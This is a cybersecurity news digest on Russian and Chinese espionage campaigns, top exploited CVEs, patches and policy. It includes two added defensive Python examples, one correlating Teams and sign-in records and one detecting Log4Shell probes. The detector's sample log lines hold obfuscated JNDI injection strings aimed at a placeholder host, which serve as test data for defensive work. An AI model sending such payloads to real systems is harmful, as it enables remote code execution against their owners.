At a glance.
- US hunts Chinese malware staged in US networks.
- SVR cyberespionage on several fronts.
- The FSB shakes up its infrastructure.
- C2-as-a-service (and APTs are the customers).
- Five Eyes warn against top exploited vulnerabilities.
- Patch news.
- Crime and punishment.
- Courts and torts.
- Policies, procurements, and agency equities.
- Fortunes of commerce.
- Labor markets.
US hunts Chinese malware staged in US networks.
On Saturday the New York Times, citing unnamed Administration officials, reported that the US was hunting for disruptive Chinese malware that's been quietly staged in US systems. The Times' report is the result of interviews conducted over the past two months. The consensus among both government and industry experts is that the Volt Typhoon campaign began at least a year before Microsoft's report on it. Investigation has shown that the Chinese campaign is more widespread than initially believed, and that the US work to find and "eradicate" the malware has been in progress for some time. The infestation extends beyond telecommunications systems and is geographically global, not confined to Guam or even to US territory, but there do seem to be higher concentrations of the malware in the vicinity of US military installations.
SVR cyberespionage on several fronts.
Recorded Future's Insikt Group is tracking a cyberespionage campaign against diplomatic services that Russia's SVR ran between February and June of this year. The researchers don't have a great deal of direct insight into the targets' environment, but their reasonable conjecture is that the operation has reflected Russia's continuing interest in European governments, especially their diplomats. As is commonly the case, the attack begins with spearphishing, the phishbait being such lures as an ambassador's schedule, an invitation to an embassy reception, or, in a case we've seen before, an ad for a used BMW.
The message redirects to a compromised domain from which BlueBravo (as Recorded Future calls the SVR threat actor) installs malware that gives it persistence in the target's network. BlueBravo has cycled through at least three major tools this year. The one most recently used the researchers call "GraphicalProton," a loader that's staged in an ISO or ZIP file. GraphicalProton abuses legitimate services, especially Microsoft OneDrive, for delivery to the target.
In a separate case, investigators have concluded that a cyberespionage campaign against Norwegian government networks lasted four months before it was detected and action taken to stop it, Bloomberg reports. The effort, generally attributed to Russian intelligence services, exploited a now-patched vulnerability in Ivanti Endpoint Manager Mobile. Yesterday the US Cybersecurity and Infrastructure Security Agency (CISA) and the Norwegian National Cyber Security Centre (NCSC-NO) released a joint Cybersecurity Advisory (CSA) on the incident.
Microsoft reported this week that the Russian threat group Midnight Blizzard (which Redmond formerly tracked as Nobelium, and which US and British intelligence services identify as an operation of Russia's SVR) is currently engaged in highly targeted social engineering attacks against a range of Western targets. The goal of the operation, as is almost invariably the case with SVR work, is espionage. The present campaign is credential phishing, and it uses security-themed tenant subdomains as phishbait. The attack is staged from previously compromised Microsoft 365 tenants owned by small businesses, and it's designed to capture authentication tokens that can be used in further attacks. The attack typically proceeds in three stages. The first is a request to chat in Microsoft Teams, often impersonating a member of a technical support or security team. The second asks the target to act in their authentication app: the attacker directs them to enter a code into Microsoft Authenticator. The third is the resulting successful multifactor authentication. "If the targeted user accepts the message request and enters the code into the Microsoft Authenticator app, the threat actor is granted a token to authenticate as the targeted user," Microsoft explains. "The actor gains access to the user’s Microsoft 365 account, having completed the authentication flow." From this point Midnight Blizzard enters its post-compromise phase, which involves information theft and, in some instances, the addition of an attacker-controlled managed device to the organization's tenant.
The SVR is casting a wide net. Its targets are found in the government, non-governmental organizations (NGOs), IT services, technology, discrete manufacturing, and media sectors.
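The three-stage flow above is easier to catch by correlation than by any single event. What follows is an added example, written for this page; it is not Microsoft's hunting content and not code from the original report. It runs over constructed Teams audit records and constructed sign-in records (the field names, the security-themed keyword list, and the known-device inventory are all assumptions) and flags a user who accepted an external chat from a security-themed *.onmicrosoft.com tenant and then, within a short window, completed an Authenticator-approved sign-in to a device never seen for that user.

```python
"""
Added example (not Microsoft's hunting content and not from the original page):
correlate constructed Teams audit records with constructed sign-in records to
surface the three-stage pattern described above. Field names, the keyword
list and the known-device map are assumptions for illustration.
"""
from datetime import datetime, timedelta

# Assumed keyword list for "security-themed" tenant names; tune to taste.
SECURITY_THEMED = ("security", "protection", "identity", "helpdesk", "support", "verify", "msft")

# Constructed Teams audit records: external users opening a chat with internal users.
TEAMS_EVENTS = [
    {"time": "2023-08-02T09:01:00", "op": "ChatCreated",
     "sender": "helpdesk@msftprotection.onmicrosoft.com", "recipient": "alice@example.org"},
    {"time": "2023-08-02T09:30:00", "op": "ChatCreated",
     "sender": "pm@contoso.onmicrosoft.com", "recipient": "bob@example.org"},
    {"time": "2023-08-02T11:00:00", "op": "ChatCreated",
     "sender": "it@identity-verify.onmicrosoft.com", "recipient": "carol@example.org"},
]

# Constructed sign-in records: the MFA method used and the device the token was issued to.
SIGNIN_EVENTS = [
    {"time": "2023-08-02T09:04:00", "user": "alice@example.org",
     "method": "Microsoft Authenticator", "device_id": "dev-unseen-1", "result": "Success"},
    {"time": "2023-08-02T09:35:00", "user": "bob@example.org",
     "method": "Microsoft Authenticator", "device_id": "dev-bob-laptop", "result": "Success"},
    {"time": "2023-08-02T13:00:00", "user": "carol@example.org",
     "method": "Microsoft Authenticator", "device_id": "dev-unseen-2", "result": "Success"},
]

# Assumed inventory of devices each user has signed in from before.
KNOWN_DEVICES = {
    "alice@example.org": {"dev-alice-laptop"},
    "bob@example.org": {"dev-bob-laptop"},
    "carol@example.org": {"dev-carol-laptop"},
}

def tenant_label(sender):
    """'x@foo.onmicrosoft.com' -> 'foo'; None for any other domain."""
    domain = sender.rsplit("@", 1)[-1].lower()
    suffix = ".onmicrosoft.com"
    return domain[:-len(suffix)] if domain.endswith(suffix) else None

def is_security_themed_tenant(sender):
    label = tenant_label(sender)
    return label is not None and any(k in label for k in SECURITY_THEMED)

def correlate(teams, signins, known_devices, window_minutes=30):
    """Stage 1 (external chat from a security-themed tenant) followed within the
    window by stage 3 (Authenticator-approved sign-in to a device the user has
    never used). Bob's chat is from an ordinary tenant and Carol's sign-in is
    two hours later, so on the constructed data only Alice is flagged."""
    alerts = []
    for chat in teams:
        if chat["op"] != "ChatCreated" or not is_security_themed_tenant(chat["sender"]):
            continue
        t0 = datetime.fromisoformat(chat["time"])
        for s in signins:
            if s["user"] != chat["recipient"] or s["result"] != "Success":
                continue
            if s["method"] != "Microsoft Authenticator":
                continue
            delta = datetime.fromisoformat(s["time"]) - t0
            if not (timedelta(0) <= delta <= timedelta(minutes=window_minutes)):
                continue
            if s["device_id"] in known_devices.get(s["user"], set()):
                continue
            alerts.append({
                "user": s["user"],
                "sender": chat["sender"],
                "device_id": s["device_id"],
                "minutes_after_chat": int(delta.total_seconds() // 60),
            })
    return alerts

if __name__ == "__main__":
    for a in correlate(TEAMS_EVENTS, SIGNIN_EVENTS, KNOWN_DEVICES):
        print(a)   # one alert, for alice@example.org, 3 minutes after the chat
```

The window and the "never seen device" test are where the false-positive tuning lives; a legitimate external helpdesk tenant can be excluded at the keyword stage, and the device check is what separates a real token grant to the attacker from the user simply approving their own sign-in. This is an illustration of tying the stages together in telemetry, not a substitute for the tenant-side controls Microsoft recommends.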
The FSB shakes up its infrastructure.
Industry research has been exposing Russian cyber operations, and the increased light this has shed on their activities has led Russia's FSB to add a number of domains to its attack infrastructure the better to escape unwanted scrutiny. Recorded Future reports that the FSB activity it tracks as BlueCharlie (Microsoft calls it "Star Blizzard," formerly "Seaborgium") has registered ninety-four new domains for its infrastructure. That infrastructure supports credential-harvesting, intelligence collection, and hack-and-leak operations. The FSB's targets are Ukraine and members of the NATO alliance. The hack-and-leak operations follow an FSB tradition of going beyond simple collection and analysis to conduct activities online that create and develop narratives that support Russian disinformation.
C2-as-a-service (and APTs are the customers).
Researchers at Halcyon have published a report looking at command-and-control providers used by ransomware gangs. Specifically, the researchers point to the Cloudzy virtual private server (VPS) provider as “the common service provider supporting ransomware attacks and other cybercriminal endeavors.” Cloudzy is incorporated in the US, but the researchers believe the company “almost certainly operates out of Tehran, Iran – in possible violation of U.S. sanctions.”
The researchers state, “Threat actors that are assessed to be leveraging Cloudzy include APT groups tied to the Chinese, Iranian, North Korean, Russian, Indian, Pakistani, and Vietnamese governments; a sanctioned Israeli spyware vendor whose tools are known to target civilians; several criminal syndicates and ransomware affiliates whose campaigns have spurred international headlines.”
Five Eyes warn against top exploited vulnerabilities.
Cybersecurity agencies of the Five Eyes on Thursday issued a joint Cybersecurity Advisory (CSA), 2022 Top Routinely Exploited Vulnerabilities, describing the vulnerabilities that attackers exploited most often last year. They’re still relevant, still a matter of concern. Here are the vulnerabilities atop the list:
- CVE-2018-13379. This one affects Fortinet SSL VPNs. It was also among the most routinely exploited vulnerabilities in 2020 and 2021. The advisory points out that its continued exploitation shows how laggard organizations tend to be in patching.
- CVE-2021-34473, CVE-2021-31207, CVE-2021-34523. These are the ProxyShell vulnerabilities, and they affect Microsoft Exchange email servers. When they’re exploited together, they can enable remote code execution in the target.
- CVE-2021-40539. Exploitation of this one enables unauthenticated remote code execution in Zoho ManageEngine ADSelfService Plus. This is another old one, with exploitation observed since late 2021. It’s also been, the advisory says, “linked to the usage of an outdated third-party dependency.”
- CVE-2021-26084. This one afflicts Atlassian Confluence Server and Data Center, and its exploitation also enables unauthenticated arbitrary code execution. The vulnerable system is a web-based collaboration tool used by both governments and private companies. It rose quickly up the leader board after a proof-of-concept was published within a week of the vulnerability’s disclosure. Mass exploitation was first observed in 2021.
- CVE-2021-44228. This one is famous as Log4Shell. It affects Apache’s Log4j library, which is an open-source logging framework used by thousands of products worldwide. An attacker can exploit Log4Shell with a specially crafted request to a vulnerable system, leading to arbitrary code execution. Such a request can allow an attacker to take full control of a system. At that point the bad actor can steal information, stage ransomware, or conduct a range of other hostile and malicious activity. The advisory says, “Malicious cyber actors began exploiting the vulnerability after it was publicly disclosed in December 2021, and continued to show high interest in CVE-2021-44228 through the first half of 2022.”
- CVE-2022-22954, CVE-2022-22960. These two vulnerabilities allow remote code execution, privilege escalation, and authentication bypass in VMware Workspace ONE Access, Identity Manager, and other VMware products. The advisory cautions, “A malicious cyber actor with network access could trigger a server-side template injection that may result in remote code execution. Exploitation of CVE-2022-22954 and CVE-2022-22960 began in early 2022 and attempts continued throughout the remainder of the year.”
- CVE-2022-1388. This vulnerability allows unauthenticated actors to bypass iControl REST authentication on F5 BIG-IP application delivery and security software.
- CVE-2022-30190. This one affects the Microsoft Support Diagnostic Tool (MSDT) in Windows. A remote, unauthenticated actor could exploit CVE-2022-30190 to take control of an affected system.
- And, finally, CVE-2022-26134, a critical remote-code execution vulnerability that affects Atlassian Confluence Server and Data Center. This one was probably first exploited as a zero-day before its public disclosure in June of last year.
It’s worth noting how many of the vulnerabilities continued to be exploited after patches were available. It suggests the effect that slow patching can have on an organization. As CISA so often says, “Apply updates per vendor instructions,” and, we might add, sooner rather than later.
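Log4Shell is the entry on the list most likely to show up in your own logs, and the obvious check (grep for "${jndi:") misses most real probes because Log4j evaluates nested lookups such as ${lower:j} and ${env:UNSET:-j} before the string reaches the JNDI handler. The following Python is an added example written for this page, not code from the advisory or from any vendor; it collapses the common nesting idioms before matching and runs over constructed request lines (the user-agent values are made up for illustration, not captured traffic).

```python
"""
Added example (not from the Five Eyes advisory or the original page): a
log-side detector for Log4Shell (CVE-2021-44228) probes that first collapses
the lookup nesting attackers use to dodge naive "${jndi:" matching. The
sample requests below are constructed, not captured traffic.
"""
import re

# Constructed web-server log lines; ua= is the User-Agent, a common injection point.
SAMPLE_LINES = [
    'GET / HTTP/1.1 ua="Mozilla/5.0"',
    'GET / HTTP/1.1 ua="${jndi:ldap://203.0.113.5:1389/a}"',
    'GET / HTTP/1.1 ua="${${lower:j}ndi:${lower:l}dap://203.0.113.5/a}"',
    'GET / HTTP/1.1 ua="${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap://x/a}"',
    'GET / HTTP/1.1 ua="${date:yyyy}"',
]

# Innermost lookup: ${...} whose body contains no further $, { or }.
INNER = re.compile(r"\$\{([^${}]*)\}")
# Final pattern after normalization; the protocol is captured (ldap, rmi, dns, ...).
JNDI = re.compile(r"\$\{jndi:([a-z]+):", re.I)

def _resolve(body):
    """Literal a Log4j 2 lookup would produce for the common obfuscation idioms,
    or None when the lookup is not one we can evaluate statically."""
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:                     # ${env:UNSET:-x}, ${sys:UNSET:-x}, ${::-x} -> "x"
        return body.split(":-", 1)[1]    # assumes the looked-up key is unset, as in attacks
    return None

def normalize(s, max_rounds=50):
    """Evaluate innermost lookups repeatedly, inside out. Lookups we cannot
    evaluate (including the final ${jndi:...}) are frozen behind a NUL marker
    so the loop terminates, then restored at the end."""
    for _ in range(max_rounds):
        changed = False
        def sub(m):
            nonlocal changed
            r = _resolve(m.group(1))
            if r is None:
                return "\x00{" + m.group(1) + "}"
            changed = True
            return r
        s = INNER.sub(sub, s)
        if not changed:
            break
    return s.replace("\x00{", "${")

def naive_hits(lines):
    """What a plain substring match sees: only the unobfuscated probe."""
    return [i for i, line in enumerate(lines) if "${jndi:" in line]

def scan(lines):
    """Return (index, protocol, normalized_line) for each line that contains a
    JNDI lookup once the obfuscation is collapsed."""
    hits = []
    for i, line in enumerate(lines):
        norm = normalize(line)
        m = JNDI.search(norm)
        if m:
            hits.append((i, m.group(1).lower(), norm))
    return hits

if __name__ == "__main__":
    print("naive:", naive_hits(SAMPLE_LINES))          # [1]
    for i, proto, norm in scan(SAMPLE_LINES):           # lines 1, 2 and 3
        print(f"line {i}: jndi/{proto}: {norm}")
```

The normalizer is deliberately conservative: it only evaluates lookups whose result is fixed by the string itself (case conversion and the ":-" default syntax), and freezes anything else rather than guessing. It is a hunting aid for finding who probed you, not a mitigation; the fix remains the one the advisory gives, patching Log4j.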
Patch news.
The US Cybersecurity and Infrastructure Security Agency (CISA) published three malware analysis reports on malware variants exploiting CVE-2023-2868, a remote command injection vulnerability affecting Barracuda Email Security Gateways (ESGs). One of the malware strains, called “Submarine,” was deployed by the suspected Chinese threat actor UNC4841, BleepingComputer reports. Barracuda has offered mitigations, and even replacement of affected devices.
And this isn't a patch, strictly speaking, but rather advice on proper configuration of a useful and powerful tool. The US National Security Agency (NSA) has issued guidance on how to harden Cisco next-generation firewalls (NGFW). NGFWs offer substantial security capabilities, but they require proper implementation. The agency's Cisco Firepower Hardening Guide offers detailed advice on how to configure the NGFWs to defend networks against sophisticated and persistent threats.
Crime and punishment.
Ukraine's Security Service announced that it had disrupted a network of illicit fund-transfer sites that were engaged in converting Russian rubles into Ukrainian hryvnia. The network made use of various sanctioned Russian crypto payment services to turn over more than $4 million worth of currency each month, Bank Info Security reports. The Security Service of Ukraine said that "underground exchange points" were found and shuttered in Kyiv, Kharkiv, Rivne, and Sumy.
Razzlekhan and her inamorato, now being called "the Crypto Couple" or "the Bitcoin Bonnie and Clyde," have entered their guilty pleas. Heather Morgan (noms de rap "Razzlekhan" and "the crocodile of Wall Street") and Ilya Lichtenstein copped a plea to money laundering. Mr. Lichtenstein admitted to doing the actual hacking; Ms Morgan took a plea to conspiracy to launder money and conspiracy to defraud the United States. He faces up to twenty years on his single count; she faces up to five years on each of her two counts. They took a lot of coin, back in the day: some 120,000 Bitcoin, presently worth about $4.5 billion. There's irony in how they were caught. The power couple spent some of their vast wealth on a couple of Walmart gift cards (they bought an Uber ride and a PlayStation), which proved the essential spoor that put law enforcement on their trail, and the rest is history. You'd think with a billion and change you'd be more inclined to take your trade to Burberry, say, or Hermès, but hey, chacun à son goût. Or is there sometimes a connection between greed and a zeal for reliable merchandise at an affordable price? Discuss among yourselves.
Courts and torts.
On Monday the California Privacy Protection Agency (CPPA) announced it’s launching an investigation into the data practices of internet-connected cars. Established in 2020, the agency was granted the authority as of July 1 to conduct operations that help residents of the US state of California to better understand and control what data is being collected from them. This probe will be the first application of this new power. As the Washington Post explains, smart cars have become increasingly popular in recent years, and it has become difficult to find a modern car that doesn’t have some internet-connectivity. Ashkan Soltani, CPPA’s executive director, states, “Modern vehicles are effectively connected computers on wheels. They’re able to collect a wealth of information via built-in apps, sensors, and cameras, which can monitor people both inside and near the vehicle.” The data collected from drivers – which includes web histories, driving habits, and movement tracking that can reveal information about everything from religious practices to medical histories – is highly valuable to data brokers as well as insurance companies, and many users are unaware of their data privacy rights. Soltani continues, “Our Enforcement Division is making inquiries into the connected vehicle space to understand how these companies are complying with California law when they collect and use consumers’ data.”
German data regulator the Bavarian State Office for Data Protection Supervision has revealed it’s been investigating WorldCoin, a project that collects user biometric data – an iris scan, to be exact – in an effort to create an "identity and financial network." WorldCoin, which officially launched last week, was co-founded by Sam Altman, CEO of controversial artificial intelligence research lab OpenAI, Molly White explains. Like something out of an episode of Black Mirror, users' irises are scanned by an ominous-looking silver orb, and in exchange they receive a digital ID which can then be used as verification for cryptocurrency transactions. WorldCoin says 2.1 million people have signed up for the program at sites in various countries including France, Germany and Spain, mostly during a trial period over the past two years.
Policies, procurements, and agency equities.
The White House, through the Office of the National Cyber Director, released the National Cyber Workforce and Education Strategy this week. The plan builds on the National Cybersecurity Strategy, released on March 1st of this year. It's an ambitious, "whole-of-nation" effort. A number of agencies have been given specific roles and missions, and the strategy includes a long and heterogeneous list of private-sector partners. The strategy isn't confined to educating Americans for jobs in the cybersecurity workforce. One of its objectives is to raise cybersecurity awareness and basic skills among the population at large. The motivation for this aspect of the strategy is the pervasiveness of activities in cyberspace in commerce and other aspects of daily life. The document "charts a course for preparing Americans for today’s jobs and enable everyone to participate fully in our interconnected society."
The White House also has expressed its strong support for reauthorization of the controversial Section 702 surveillance authorization. The Register reports that the Administration made its stance even clearer by releasing the "vast majority" of the President's Intelligence Advisory Board (PIAB) report on the intelligence community’s surveillance power as support for reauthorization. The statement from the White House reads, "We agree with the unanimous conclusion reached by this group of independent, deeply experienced experts that failure to reauthorize Section 702 could be 'one of the worst intelligence failures of our time.’” While the report does recommend renewal, it also confirms that "complacency, a lack of proper procedures, and the sheer volume of Section 702 activity led to FBI's inappropriate use" of its powers.
Fortunes of commerce.
DataTribe has published a report on the cybersecurity market in Q2 2023, outlining the following findings:
- "Seeds for Growth: Deal volume for early-stage cyber companies started to rebound in Q2. With 47 deals, Q2 increased from the depths of Q1 by nearly 50 percent. The data shows significantly fewer early-stage deals than in 2022 but at healthy valuations. A flight to quality in venture capital persists. The performance bar that will attract venture capital remains exceptionally high.
- "End of Runway May Be Closer Than It Appears: We are approaching the end of the runway for startups that sat on the fundraising sidelines for the past 18-24 months. We could see a lot of bumpy landings coming down the pike. This will be more acute for cash-burning later-stage companies. There were only four growth-stage cybersecurity deals in Q223, on par with Q123. Year-over-year, deal volume is down 75% (16 to 4) at this stage.
- "AI Pixie Dust Doesn’t Drive Value, AI Productivity Will: In the first half of 2023, AI companies raised $25B, slightly down from $29B in H1 2022. AI was down just 14% YoY in the same period, while global venture capital declined 50%. But, companies need to show that AI is more than a buzzword. How can companies best position their AI capabilities in a manner that attracts customers and investors without overblowing expectations?"
Labor markets.
Immersive Labs has released its Cyber Workforce Benchmark Report, noting significant improvements in response time to cyber incidents. The report notes “Organizations’ median response time to emerging threats improved by one-third, indicating a significant increase in the speed of response and continued progress compared to the year prior. Enterprises have enhanced their knowledge about newly discovered threats and vulnerabilities, enabling them to respond more rapidly than ever before.” The researchers point to the Log4j crisis as “a watershed moment that could well have been a catalyst for this urgency given its catastrophic impact on organizations around the world.”